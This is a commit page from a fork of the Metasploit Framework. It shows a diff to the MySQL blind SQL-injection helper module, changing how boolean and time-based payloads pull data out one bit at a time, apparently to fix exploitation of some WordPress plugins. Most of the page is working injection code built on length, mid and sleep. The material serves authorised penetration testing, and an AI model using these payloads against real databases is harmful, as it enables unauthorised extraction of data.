dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Use = instead of <> for blind queries (fixes some wordpress plugin SQLis)

This commit is contained in:
Redouane NIBOUCHA 2022-01-30 23:01:08 +00:00
parent b86d5c5dd1
commit e329d78a46
1 changed files with 12 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
lib/msf/core/exploit/sqli/mysqli/common.rb
View File

@ -277,17 +277,23 @@ module Msf::Exploit::SQLi::MySQLi
def blind_detect_length(query, timebased)
if_function = ''
sleep_part = ''
reversed_sleep_part = ''
if timebased
if_function = 'if(' + if_function
sleep_part += ",sleep(#{datastore['SqliDelay']}),0)"
sleep_part += ",0,sleep(#{datastore['SqliDelay']}))"
reversed_sleep_part = ",sleep(#{datastore['SqliDelay']}),0)"
end
i = 0
output_length = 0
loop do
output_bit = blind_request("#{if_function}length(cast((#{query}) as binary))&#{1 << i}<>0#{sleep_part}")
output_bit = blind_request("#{if_function}length(cast((#{query}) as binary))&#{1 << i}=0#{sleep_part}")
# if it's timebased, it will sleep if the bit is 1
# otherwise, it will return true if the bit is 0
output_bit = !output_bit unless timebased
output_length |= (1 << i) if output_bit
i += 1
stop = blind_request("#{if_function}floor(length(cast((#{query}) as binary))/#{1 << i})=0#{sleep_part}")
stop = blind_request("#{if_function}floor(length(cast((#{query}) as binary))/#{1 << i})=0#{reversed_sleep_part}")
stop = !stop unless timebased
break if stop
end
output_length
@ -307,13 +313,14 @@ module Msf::Exploit::SQLi::MySQLi
sleep_part = ''
if timebased
if_function = 'if(' + if_function
sleep_part += ",sleep(#{datastore['SqliDelay']}),0)"
sleep_part += ",0,sleep(#{datastore['SqliDelay']}))"
end
output = length.times.map do |j|
current_character = known_bits
bits_to_guess.times do |k|
# the query below: the inner substr returns a character from the result, the outer returns a bit of it
output_bit = blind_request("#{if_function}ascii(mid(cast((#{query}) as binary), #{j + 1}, 1))&#{1 << k}<>0#{sleep_part}")
output_bit = blind_request("#{if_function}ascii(mid(cast((#{query}) as binary), #{j + 1}, 1))&#{1 << k}=0#{sleep_part}")
output_bit = !output_bit unless timebased
current_character |= (1 << k) if output_bit
end
current_character.chr